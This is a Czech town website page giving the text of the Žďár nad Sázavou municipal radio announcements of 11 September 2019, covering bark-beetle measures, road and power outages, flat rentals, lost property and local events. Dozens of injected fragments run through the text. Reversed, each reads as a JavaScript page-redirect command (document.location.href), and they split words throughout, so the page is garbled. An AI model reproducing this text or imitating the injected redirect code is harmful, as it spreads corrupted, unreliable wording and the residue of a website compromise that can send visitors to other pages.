Rainbow page separator

Hlášení městského rozhlasu vysílaného dne 11. září 2019

Středa, 11. září 2019

Žďár nad Sázavou / Přinášíme Vám aktuální informace z hlášení městského rozhlasu vysílaného dne 11. září 2019.

Z ÚŘADU:

Městský úřad Žďár nad Sázavou, odbor životního prostředí v souvislosti s kůrovcovou kalami[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou upozorňuje vlastníky lesů na nárůst stavu kůrovců v lesích a žádá je, aby opě[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovně prověřili v součinnosti s odborným lesním hospodářem stav lesů a odstranili, popřípadě asanovali napadené stromy. Napadené dřevo je třeba urychleně mechanicky či chemicky ošetřit a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to před výletem dospělců z napadeného dříví. Bližší informace najdete na webových stránkách města.

Vzhledem k výpadku ve výrobě materiálu na opravu šachty v ulici Husova je společnost SATT nucena posunout opravu horkovodu a celou uzavírku ulice na období od 2. září do 30. září 2019. Do té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to doby budou dodávky tepelné energie v dané lokalitě bez omezení. Při opravě budou postiženi odběratelé v ulicích Veselská (pouze část před MŠ Sluníčko), Husova, Hálkova, Binkova, Drdlova, Sadová, Nádražní (od pošty směrem k nám. Republiky), Tyršova (od pošty k divadlu)

Městský úřad Žďár nad Sázavou Vás zve na Den otevřených dveří 20. září 2019 od 13:00 do 19:00 hodin ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tokrát na téma My a Unesco. Přijďte se podívat, zasoutěžit si, zaspor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat a prožít zajímavé odpoledne.

Zveme Vás na prohlídku rekonstruované spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní zóny v areálu pro fotbal a tenis na Bouchalkách, která se bude konat 14. září 2019 od 15:00 do 17:00 hodin. Přijďte si prohlédnout nově zrekonstruované pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tory zázemí pro spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovce a užít si spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní odpoledne s rodinou a přáteli.

Dne 3. září 2019 byly odebrány vzorky ze studánek U Křiváku, Klafar a Salvá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torka. Vzorky studánek U Křiváku a Klafar jsou nevyhovující, vyhovuje pouze studánka Salvá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torka. Upozorňujeme občany, že studánky nejsou primárním zdrojem pitné vody. Kvalita vody platí pouze v den odběru.

VYHLÁŠENÉ ZÁMĚRY MĚSTA:

Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to Žďár nad Sázavou vyhlašuje záměry na pronájem dvou bytů na ulici Brodská ve Žďáře nad Sázavou 3. Jedná se o byt č. 34, v budově č. p. 1825, č. o. 11. Základní nájemné činí 1 491,- Kč/měsíc. Dále byt č. 26, v budově č. p. 1876, č. o. 27. Základní nájemné činí 1 459,- Kč/měsíc .

Na těch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to bytech není v době vyhlášení záměru přihlášena k trvalému pobytu žádná osoba. Přihlášky je možné odevzdávat do 12. září 2019 do 12:00 hodin. Bližší informace naleznete na úřední desce města.

Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to Žďár nad Sázavou vyhlašuje záměr na pronájem bytu č. 26, v budově č. p. 1932, č. o. 43 na ulici Brodská, Žďár nad Sázavou 3. Základní nájemné činí 1 432,- Kč/měsíc.

Na [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to bytě není v době vyhlášení záměru přihlášena k trvalému pobytu žádná osoba. Přihlášky je možné podávat do 26. září 2019 do 12:00 hodin. Bližší informace naleznete na úřední desce města.

VÝLUKY: 

E.ON Distribuce a.s. oznamuje, že bude přerušena dodávka elektrické energie v pátek 13. září 2019 od 7:30 do 11:30 hodin pro oblast Zámek č. 1 – 7 (hlavní budova, věž, budova školy, Convent, sádky…)

E.ON Distribuce a.s. oznamuje, že bude přerušena dodávka elektrické energie v pátek 13. září 2019 od 7:30 do 12:30 hodin na ulici Okružní (horní) č. o. 1, 3, 5, 7, 9, 11 (Satt), 13, 15, dále č. o. 16, 18, 20, 28, 30, 32, řadové garáže u Sattu a okolí. 

E.ON Distribuce a.s. oznamuje, že bude přerušena dodávka elektrické energie v úterý 17. září 2019 od 7:30 do 12:30 hodin na ulici U Táferny (mimo RD č. 91, 92 a 440), část ulice Purkyňova od ul. U Táferny po d. č. 452/3 a 450/16 včetně, ulice Santiniho č. 38/4 (Restaurace Táferna), č. 183/2.

E.ON Distribuce a.s. oznamuje, že bude přerušena dodávka elektrické energie ve středu 18. září 2019 od 7:30 do 11:30 hodin na ulici Vysocká od kruhového objezdu pravá strana ulice směr Vysoké (mimo č. o. 33 a 63), ulice V Lískách, Na Úvoze, K Přehradě. Bližší informace naleznete na úřední desce města.

ZTRÁTY A NÁLEZY:

Odbor finanční oznamuje, že na ztráty a nálezy byly v průběhu [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to týdne předány následující nálezy: peněženka + ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovost, svazek klíčů + klíčenka, brýle, svazek klíčů a ces[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní taška. Úplný seznam nalezených věcí je zveřejněn na úřední desce i na facebooku města. Bližší informace Vám poskytne Alena Benešová na tel. čísle 566 688 146 nebo osobně v kanceláři finančního odboru v 1. patře městského úřadu, dveře č. 35.

KULTURNÍ POZVÁNKY:

Přijměte pozvání na Žďárské farmářské trhy, které se budou konat v sobotu 14. září 2019 na náměstí Republiky.

Do 15. září 2019 probíhá kulturní festival Slavnosti jeřabin. Kompletní program festivalu naleznete na webových stránkách města.

Zveme vás na akci v rámci Evropského týdne mobility, která se uskuteční ve středu 18. září 2019 na náměstí Republiky. Od 13:00 do 17.00 hodin si budete moci prohlédnout a vyzkoušet elektromobily, elektrokola a koloběžky nebo se pobavit s odborníky na [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to téma.

Kino Vysočina Vás zve ve čtvrtek 12. září 2019 v 17:00 hod. na film „Fabrika“